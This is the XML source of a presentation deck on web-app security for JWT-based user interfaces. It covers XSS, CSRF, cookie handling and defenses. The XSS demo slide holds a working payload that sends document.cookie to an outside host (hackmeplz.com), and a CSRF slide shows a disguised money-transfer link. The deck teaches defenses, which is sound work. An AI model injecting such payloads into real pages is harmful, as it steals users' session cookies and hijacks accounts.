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77" r:id="rId2"/>
    <p:sldId id="290" r:id="rId3"/>
    <p:sldId id="289" r:id="rId4"/>
    <p:sldId id="343" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="344" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="300" r:id="rId9"/>
    <p:sldId id="347" r:id="rId10"/>
    <p:sldId id="365" r:id="rId11"/>
    <p:sldId id="301" r:id="rId12"/>
    <p:sldId id="366" r:id="rId13"/>
    <p:sldId id="302" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="304" r:id="rId16"/>
    <p:sldId id="305" r:id="rId17"/>
    <p:sldId id="346" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="364" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="348" r:id="rId23"/>
    <p:sldId id="349" r:id="rId24"/>
    <p:sldId id="341" r:id="rId25"/>
    <p:sldId id="297" r:id="rId26"/>
    <p:sldId id="350" r:id="rId27"/>
    <p:sldId id="296" r:id="rId28"/>
    <p:sldId id="367" r:id="rId29"/>
    <p:sldId id="306" r:id="rId30"/>
    <p:sldId id="307" r:id="rId31"/>
    <p:sldId id="308" r:id="rId32"/>
    <p:sldId id="351" r:id="rId33"/>
    <p:sldId id="309" r:id="rId34"/>
    <p:sldId id="313" r:id="rId35"/>
    <p:sldId id="314" r:id="rId36"/>
    <p:sldId id="342" r:id="rId37"/>
    <p:sldId id="315" r:id="rId38"/>
    <p:sldId id="357" r:id="rId39"/>
    <p:sldId id="316" r:id="rId40"/>
    <p:sldId id="318" r:id="rId41"/>
    <p:sldId id="320" r:id="rId42"/>
    <p:sldId id="322" r:id="rId43"/>
    <p:sldId id="325" r:id="rId44"/>
    <p:sldId id="352" r:id="rId45"/>
    <p:sldId id="353" r:id="rId46"/>
    <p:sldId id="358" r:id="rId47"/>
    <p:sldId id="355" r:id="rId48"/>
    <p:sldId id="356" r:id="rId49"/>
    <p:sldId id="327" r:id="rId50"/>
    <p:sldId id="328" r:id="rId51"/>
    <p:sldId id="329" r:id="rId52"/>
    <p:sldId id="333" r:id="rId53"/>
    <p:sldId id="334" r:id="rId54"/>
    <p:sldId id="335" r:id="rId55"/>
    <p:sldId id="339" r:id="rId56"/>
    <p:sldId id="359" r:id="rId57"/>
    <p:sldId id="360" r:id="rId58"/>
    <p:sldId id="361" r:id="rId59"/>
    <p:sldId id="363" r:id="rId60"/>
    <p:sldId id="362" r:id="rId61"/>
    <p:sldId id="369" r:id="rId62"/>
    <p:sldId id="368" r:id="rId63"/>
    <p:sldId id="370" r:id="rId64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BM_USER" initials="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9CEF2"/>
    <a:srgbClr val="9EC0E1"/>
    <a:srgbClr val="142F84"/>
    <a:srgbClr val="102361"/>
    <a:srgbClr val="114DFA"/>
    <a:srgbClr val="1A35B8"/>
    <a:srgbClr val="2C5BF2"/>
    <a:srgbClr val="0F1D68"/>
    <a:srgbClr val="4DAF71"/>
    <a:srgbClr val="5FD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2" autoAdjust="0"/>
    <p:restoredTop sz="86418" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="-1712" y="-1304"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1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016" y="-72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0C2F6-885F-4A0B-AF85-F3450FB47DD3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A24D6-251B-407E-82E1-7D4FFC215B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5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E9BF1-D0ED-43A4-AA4C-A2A9E8879F74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F763-C6E4-440E-B509-1FF5BDD97D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5626" y="0"/>
            <a:ext cx="9149626" cy="68686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B5F272-8705-D240-B86A-0579F7912F93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E0510B-836D-954D-A244-02A1CE6CC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97014"/>
            <a:ext cx="7772400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737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no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661FBC-E186-4B5A-9F36-3864254C1B62}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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ABCD18-FDAE-4156-96C9-E0797DD44D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48400"/>
            <a:ext cx="9149670" cy="62221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0" y="6380924"/>
            <a:ext cx="1859278" cy="360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tx1"/>
          </a:solidFill>
          <a:latin typeface="HelveticaNeueLT Pro 65 Md"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="HelveticaNeueLT Pro 65 Md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3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6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4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None/>
        <a:defRPr sz="2000" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="HelveticaNeueLT Pro 55 Roman"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="HelveticaNeueLT Pro 55 Roman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about/appsecurity/learning/xss/%23StoredX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Cross-Site_Request_Forgery_(CSRF" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_polic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rsite.com/transferMoney?to=BadGuy&amp;amount=10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ormpath/stormpath-sdk-angularjs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00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9000/api/thing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tormpath.com/guides/api-key-management/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.stormpath.com/home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i.stormpath.com/register" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@stormpath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5" y="6040223"/>
            <a:ext cx="3040915" cy="5891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295400"/>
            <a:ext cx="8305800" cy="2266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200" spc="120" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 35 Th"/>
                <a:cs typeface="HelveticaNeueLT Pro 35 Th"/>
              </a:rPr>
              <a:t>Building Secure User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 35 Th"/>
                <a:cs typeface="HelveticaNeueLT Pro 35 Th"/>
              </a:rPr>
              <a:t>Interfaces With JWTs (JSON Web Tokens)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343400"/>
            <a:ext cx="9144000" cy="83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Robert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0" err="1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Damphousse</a:t>
            </a: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 @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0" err="1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robertjd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
                <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" spc="100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
              <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
                <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
              </a:rPr>
              <a:t>Lead Front-End Developer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
                <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
              </a:rPr>
              <a:t>Stormpath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225986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Securing API Endpoints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4257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Securing Server (API) Endpoints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use Session ID Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> Session  User identity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Use framework like Apache Shiro or Spring Security to assert security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Informing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Client about Access Control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7240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Providing Access Control Rules to the Client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solution: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Let the app bootstrap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GET a /me or /profile endpoint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Session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> Session  User data in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>DB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Parse response for ACL information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="51435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Access Tokens are better!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-4572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71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Cookies,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>The Right Way ®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0030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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>, The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Right Way 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Cookies can be easily compromised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Man-in-the-Middle (MITM) attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)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7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Man In The Middle (MITM)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Someone ‘listening on the wire’ between the browser and server can see and copy the cookie.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Solutions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Use HTTPS everywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TLS everywhere on internal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Cross-Site Scripting (XSS)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8833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This is a very REAL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Happens when someone else can execute code inside your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Can be used to steal your cookies!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https://www.owasp.org/index.php/XSS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0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Demo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667000"/>
            <a:ext cx="7789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https://www.google.com/about/appsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/xss/#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>StoredXSS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39548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120" dirty="0" smtClean="0"/>
              <a:t>About Stormpath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3581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spc="50" dirty="0" smtClean="0"/>
              <a:t>User Management API for Developers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Password security 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Authentication and Authorization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LDAP Cloud Sync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Instant-on, scalable, and highly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>vailable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>Free for developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="vertical_v1-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91414"/>
            <a:ext cx="5715000" cy="899786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="logo-spring-high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21" y="5029200"/>
            <a:ext cx="685800" cy="51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5029200"/>
            <a:ext cx="519590" cy="54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5029200"/>
            <a:ext cx="685801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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-05-12 at 8.49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181100"/>
            <a:ext cx="6654800" cy="4483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Left Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18846732">
            <a:off x="5413217" y="3442036"/>
            <a:ext cx="1600200" cy="68580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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2015-05-12 at 8.4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66800"/>
            <a:ext cx="6502400" cy="4991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 descr="Screen Shot 2015-05-12 at 8.4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6781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25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362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&lt;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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(function(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>')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a.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>https:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hackmeplz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourCookies.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/?cookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie;return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> a}())"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681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So what if I put this in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>chatbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>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91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Demo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352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GET https:/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hackmeplz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourCookies.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=123412341234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Your browser is going to make this request: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Which means..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4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12 at 8.4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6781800" cy="3390900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="allyourba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711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– What Can I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Escape Content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Server-side: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se well-known, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> libraries to ensure dynamic HTML does not contain executable code.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Do NOT roll your own.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Client Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scape user input from forms (some frameworks do this for you, but read the docs for caveats!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386481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– What Can I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Use HTTPS-Only cookies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sending a cookie to a client, declare it as HTTPS-Only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will not be available to the JavaScript environment, sweet!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will only be sent over secure connections, sweet!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151718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XSS Attack – What Can I Do?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 this definitive guide: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https://www.owasp.org/index.php/XSS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97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Cross-Site Request Forgery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(CSRF)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>(XSRF)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1111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Cross-Site Request Forgery (CSRF)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Exploits the fact that HTML tags do NOT follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>when making GET requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean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://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF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https://developer.mozilla.org/en-US/docs/Web/Security/Same-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>origin_policy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u="sng" spc="120" dirty="0" smtClean="0"/>
              <a:t>Talk Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng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830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Security Concerns for Modern Web Apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="50" dirty="0"/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Cookies, The Right Way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Session ID Problems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Token Authentication to the rescue!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pc="50" dirty="0" smtClean="0"/>
              <a:t>Angular Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270844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Cross-Site Request Forgery (CSRF)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 Attacker enables a user to request your server.  Example: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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>“https://myapp.com/transferMoney?to=BadGuy&amp;amount=10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”&gt;See Cute Cats!&lt;/a&gt;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What happens?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Cross-Site Request Forgery (CSRF)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browser says, “The request is going to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, so I’ll happily send along your cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your server trusts the cookies AND the identity reference, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>and transfers the money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Cross-Site Request Forgery (CSRF)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76200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 tip: never allow GET requests to modify server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Cross-Site Request Forgery (CSRF)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Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Synchronizer Token (for form-based apps)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Double-Submit Cookie (for modern apps)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header check (for extra measure)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Double Submit Cookie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client two cookies: Session ID + Random Value, maintain pointers between the two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client sends back the random value explicitly, triggering the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Same-Origin-Policy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5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09600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Double Submit Cookie Workflow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82296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2400" y="4114800"/>
            <a:ext cx="914400" cy="16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Validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Token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76800" y="34290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19600" y="5029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1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ild Secure User Interfaces using JWT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7924800" cy="5786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09600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Double Submit Cookie Workflow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2481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Double Submit Cookie Considerations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Still vulnerable to XSS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty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Token can be  hijacked, but SOP mitigates use in malicious browser environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Session cookie MUST be HTTP(S) only to prevent true hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Protect against XSS!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buFont typeface="Arial"/>
